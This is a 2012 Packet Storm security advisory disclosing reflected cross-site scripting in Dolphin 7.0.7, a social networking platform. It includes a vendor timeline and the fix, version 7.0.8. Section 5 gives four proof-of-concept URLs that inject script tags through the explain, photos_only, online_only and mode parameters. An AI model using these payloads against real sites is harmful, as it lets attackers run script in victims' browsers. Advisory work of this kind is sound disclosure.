Dolphin 7.0.7 Cross Site Scripting

2012-02-21T00:00:00
ID PACKETSTORM:109995
Type packetstorm
Reporter Aung Khant
Modified 2012-02-21T00:00:00

Description

                                        
                                            `1. OVERVIEW  
  
Dolphin 7.0.7 and lower versions are vulnerable to Cross Site Scripting.  
  
  
2. BACKGROUND  
  
Dolphin is the only "all-in-one" free community software platform for  
creating your own social networking, community or online dating site  
without any limits and under your full control. Dolphin comes with  
hundreds of features, module plugins and tools. Everything is included  
and extension posibilities are literally endless. You can use it for  
free with a BoonEx link in the footer or buy a $99 permanent license  
to remove that requirement.  
  
  
3. VULNERABILITY DESCRIPTION  
  
Multiple parameters (explain,photos_only,online_only,mode) were not  
properly sanitized, which allows attacker to conduct Cross Site  
Scripting attack. This may allow an attacker to create a specially  
crafted URL that would execute arbitrary script code in a victim's  
browser.  
  
  
4. VERSIONS AFFECTED  
  
7.0.7 and lower  
  
  
5. PROOF-OF-CONCEPT/EXPLOIT  
  
Vulnerable Parameter: explain  
  
http://localhost/dolph/explanation.php?explain=%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E  
  
  
Vulnerable Parameters: photos_only,online_only,mode  
  
http://localhost/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&photos_only='"><script>alert(/xss/)</script>  
  
http://localhost/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&online_only='"><script>alert(/xss/)</script>  
  
http://localhost/dolph/viewFriends.php?iUser=1&page=1&sort=activity&mode='"><script>alert(/xss/)</script>  
  
  
6. SOLUTION  
  
Upgade to the latest version of Dolphine.  
  
  
7. VENDOR  
  
BoonEx Pty Ltd  
http://www.boonex.com/  
  
  
8. CREDIT  
  
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.  
  
  
9. DISCLOSURE TIME-LINE  
  
2011-06-09: notified vendor  
2011-10-24: fixed version, 7.0.8, released  
2012-02-20: vulnerability disclosed  
  
  
10. REFERENCES  
  
Original Advisory URL:  
http://yehg.net/lab/pr0js/advisories/%5BDolphin_7.0.7%5D_xss  
BoonEx Home Page: http://www.boonex.com/  
  
  
#yehg [2012-02-20]  
`